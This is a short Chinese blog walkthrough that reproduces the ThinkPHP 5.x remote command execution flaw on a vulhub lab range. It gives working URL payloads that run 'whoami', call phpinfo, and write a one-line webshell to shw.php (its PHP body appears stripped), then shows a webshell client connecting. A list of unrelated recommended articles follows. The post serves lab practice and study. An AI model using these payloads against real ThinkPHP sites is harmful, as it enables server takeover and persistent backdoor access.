Thinkphp5x远程命令执行 靶场攻略

2407-2 shw2024-09-24 17:30

环境配置

云服务器:47.113.231.0:8080
靶场:vulhub/thinkphp/5-rce
docker-compose up -d #启动环境

漏洞复现

1.访问靶场:http://47.113.231.0:8080/

2.远程命令执⾏

POC:
?
s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]

\]=whoami ![](https://i-blog.csdnimg.cn/direct/04a49df66abb463c9c0543bf4c310e36.png) ### 3.远程代码执行 POC: ? s=/Index/\\think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=phpinfo\&vars\[ 1\]\[\]=-1 ![](https://i-blog.csdnimg.cn/direct/a6eeab97a027466d910a1e84e0b1d2a9.png) ### 4.写入一句话木马到根目录下的shw.php POC: ?s=index/think\\app/invokefunction\&function=call_user_func_array\&vars\[0\]=system\&vars\[1\]\[\]=echo "\" \> shw.php ### 5.蚁剑连接 ![](https://i-blog.csdnimg.cn/direct/d247f62ffdf7449bafe4d66c51704031.png)

相关推荐
hongtianzai几秒前
Laravel7.x十大核心特性解析
java·c语言·开发语言·golang·php
ZHOUPUYU20 分钟前
从缓存到消息队列的全面应用,PHP与Redis深度实战
redis·缓存·php
ZHOUPUYU1 小时前
PHP性能分析与调优:从定位瓶颈到实战优化
开发语言·后端·html·php
Du_chong_huan1 小时前
1.6 面对攻击的网络 | 《计算机网络:自顶向下方法》精读版
网络·安全·php
hongtianzai2 小时前
Laravel 10.x重磅更新:全新特性速览
php·laravel
hongtianzai2 小时前
Laravel8.x核心特性全解析
java·c语言·开发语言·golang·php
hongtianzai2 小时前
Laravel6.x重磅发布:LTS版本新特性全解析
c语言·开发语言·php·laravel
虾..2 小时前
网络其他重要协议或技术
开发语言·网络·php
2401_8442213221 小时前
深入理解K8s中的应用服务:访问、集群与配置
容器·kubernetes·php
xiangpanf1 天前
PHP vs Python:30字看透两大语言差异
开发语言·php
热门推荐
01GitHub 镜像站点02围棋-html版本03Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南04班级宠物园部署指南05小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)06OpenClaw 使用和管理 MCP 完全指南07UV安装并设置国内源08OpenClaw Control UI安全上下文访问配置09“wsl --install -d Ubuntu-22.04”下载慢,中国地区离线安装 Ubuntu 22.04 WSL方法(亲测2025年5月6日)10AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南